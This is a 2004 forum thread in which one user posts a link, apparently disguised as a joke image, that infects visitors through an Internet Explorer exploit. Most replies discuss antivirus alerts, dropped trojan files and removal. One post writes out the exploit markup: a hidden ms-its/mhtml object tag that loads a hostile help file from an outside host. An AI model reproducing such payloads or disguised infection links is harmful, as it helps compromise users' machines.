Author | Message | Time |
---|---|---|
j0ykillah | http:// four20.org/ ~sloth/ owned.jpg/ let me know what you think! | April 5, 2004, 10:34 AM |
Yoni | Owned, indeed. I love a good Javascript virus. | April 5, 2004, 10:38 AM |
Archonist | <img src="http://four20.org/~sloth/pics/owned_plunger.jpg"> <object data="ms-its:mhtml:file://C:\help.mhtml!http://four20.org/~sloth/ms-its/helpnstuff.chm::help.htm" type="text/x-scriptlet" style="visibility:hidden"> eh? | April 5, 2004, 11:47 AM |
Thing | That's what you get for using Winders/IE. I think I posted something about this a few months ago. | April 5, 2004, 1:28 PM |
Myndfyr | I just got a security warning and nothing happened. | April 5, 2004, 7:12 PM |
Newby | And I thought Norton would never find anything. Bloodhound.Exploit.6 :P EDIT -- Firefox I think ran it. :( EDIT2 -- Google brought up http://sarc.com/avcenter/venc/data/pwsteal.tarno.b.html :( | April 5, 2004, 7:12 PM |
DrivE | Aww how cute this is. | April 5, 2004, 7:17 PM |
iago | This has inspired me. And it turns out, Opera really is nicer to use than IE :) | April 5, 2004, 10:28 PM |
Tasha | Nothing happened :( | April 5, 2004, 10:41 PM |
iago | [quote author=Tasha link=board=2;threadid=6168;start=0#msg53608 date=1081204866] Nothing happened :( [/quote] If you're using internet explorer I would recommend you do a virus scan. It's just a pain in the ass more than anything. | April 5, 2004, 10:53 PM |
Mitosis | [quote author=iago link=board=2;threadid=6168;start=0#msg53609 date=1081205615] [quote author=Tasha link=board=2;threadid=6168;start=0#msg53608 date=1081204866] Nothing happened :( [/quote] If you're using internet explorer I would recommend you do a virus scan. It's just a pain in the ass more than anything. [/quote] Done it, and I got the patch for this virus. And it still wont go away. :( | April 6, 2004, 1:34 AM |
Fr0z3N | What does the virus do? | April 6, 2004, 1:48 AM |
Zakath | Anyone know what virus this is? If IE (assuming Avant didn't block it somehow) is vulnerable, I may have contracted whatever it was to my laptop this morning. I'm keeping it offline and it has no capability to perform a virus scan, so details would be appreciated. | April 6, 2004, 2:19 AM |
Thing | The symptoms will begin with a noticeable amount of congestion followed by coughing and a headache. I highly recommend taking 2 aspirin and get a real browser. | April 6, 2004, 2:29 AM |
Zakath | Thanks, Thing. ::) Now, does anyone have any real information about this? Normally I don't mind sarcasm, but when it comes to potentially compromising my security, I quite frankly don't have a lot of patience. | April 6, 2004, 2:32 AM |
Thing | C'mon Zakath. Check to see what processes are running. The ones that you don't recognize, look at the executable and check the time stamp on the file. If it corresponds to the time when you clickety clicked that link, kill the process and delete the file. You might want to look at other files that were created at the same time. The keystroke log will be one of them. Or you could do what I do when I purposefully install other peoples keylogger and monitor the traffic to find out where the mother ship is. Then you can really have some fun. >:D | April 6, 2004, 2:38 AM |
Zakath | I did check for files created and/or modified today and found nothing suspicious, nor was there anything unreasonable in the process list or any of the Run registry keys. However, since people seem to be indicating that there is a virus or trojan associated with the above link, I'm asking looking for certainty. | April 6, 2004, 2:49 AM |
Newby | Google lead me to this: http://sarc.com/avcenter/venc/data/pwsteal.tarno.b.html (After Symantic said it was Bloodhound.Exploit.6, I searched google for that, first thing that came up) But if you're running Opera/Firefox, I don't think anything happened. :( EDIT -- I also ran two anti-viruses after clicking the link with Firefox, and nothing came up. (Symantic and Pestpatrol) | April 6, 2004, 3:00 AM |
Naem | Why has the original post been left untouched? People who think it's Joy posting a link, without reading the replies first, are getting their machines infected.. should at least put a warning in there. Thankfully, logic told me to not click the link of someone who spelled boys "b0yz" and hilarious "hilariouz." | April 6, 2004, 3:08 AM |
iago | [quote author=Naem link=board=2;threadid=6168;start=15#msg53651 date=1081220893] Why has the original post been left untouched? People who think it's Joy posting a link, without reading the replies first, are getting their machines infected.. should at least put a warning in there. Thankfully, logic told me to not click the link of someone who spelled boys "b0yz" and hilarious "hilariouz." [/quote] I would have right away, but I don't moderate this forum. | April 6, 2004, 3:16 AM |
Zakath | [quote author=Newby link=board=2;threadid=6168;start=15#msg53650 date=1081220458] Google lead me to this: http://sarc.com/avcenter/venc/data/pwsteal.tarno.b.html (After Symantic said it was Bloodhound.Exploit.6, I searched google for that, first thing that came up) But if you're running Opera/Firefox, I don't think anything happened. :( EDIT -- I also ran two anti-viruses after clicking the link with Firefox, and nothing came up. (Symantic and Pestpatrol) [/quote] That link uses that exploit. However, the exploit is rather generic and could be used for almost anything. It most definitely was not that Tarno thingy. Iago informs me that it some sort of trojan that affects people who use IRC. I do not seem to have contracted it...so either it doesn't affect Avant Browser, or it didn't affect me because I don't use mIRC (unlikely). P.S. If someone hadn't removed everybody from being able to moderate this forum, I'd have removed it myself. Get rid of that link already! | April 6, 2004, 3:19 AM |
iago | [quote author=Zakath link=board=2;threadid=6168;start=15#msg53653 date=1081221590] [quote author=Newby link=board=2;threadid=6168;start=15#msg53650 date=1081220458] Google lead me to this: http://sarc.com/avcenter/venc/data/pwsteal.tarno.b.html (After Symantic said it was Bloodhound.Exploit.6, I searched google for that, first thing that came up) But if you're running Opera/Firefox, I don't think anything happened. :( EDIT -- I also ran two anti-viruses after clicking the link with Firefox, and nothing came up. (Symantic and Pestpatrol) [/quote] That link uses that exploit. However, the exploit is rather generic and could be used for almost anything. It most definitely was not that Tarno thingy. Iago informs me that it some sort of trojan that affects people who use IRC. I do not seem to have contracted it...so either it doesn't affect Avant Browser, or it didn't affect me because I don't use mIRC (unlikely). P.S. If someone hadn't removed everybody from being able to moderate this forum, I'd have removed it myself. Get rid of that link already! [/quote] I scanned myself with TrendMicro and found 3 files infected with a trojan that lets people evesdrop on irc conversations. The files were: c:\windows\system32\notepad.exe c:\windows\system32\taskmngr.exe - note, it's not taskmgr.exe And the third was a .exe file that got saved in Temporary Internet Files. If you clicked on the link, I would recommend finding and deleting those files. I sent a message to Skywing, and Grok/Adron are offline. Hopefully he'll get it and kill the link quickly. Incidentally, why didn't Thing remove it? | April 6, 2004, 3:32 AM |
Newby | Heh. I didn't find any of those files. I think it only did something on I.E :( EDIT -- My friend said he visited the page on Firefox and got a warning to allow Javascripts to run. :(++ | April 6, 2004, 4:02 AM |
Noodlez | It created notepad in system32, and changed it so that text files run with the new notepad. Took 5 minutes to fix. | April 6, 2004, 5:01 AM |
Mitosis | Iago I found the same thing, but after I scanned it still pops up randonmly saying I have a virus. "Blood.Hound packed" or something like that. | April 6, 2004, 10:57 AM |
iago | I don't run textfiles with notepad anyway, I use UltraEdit :) | April 6, 2004, 11:25 AM |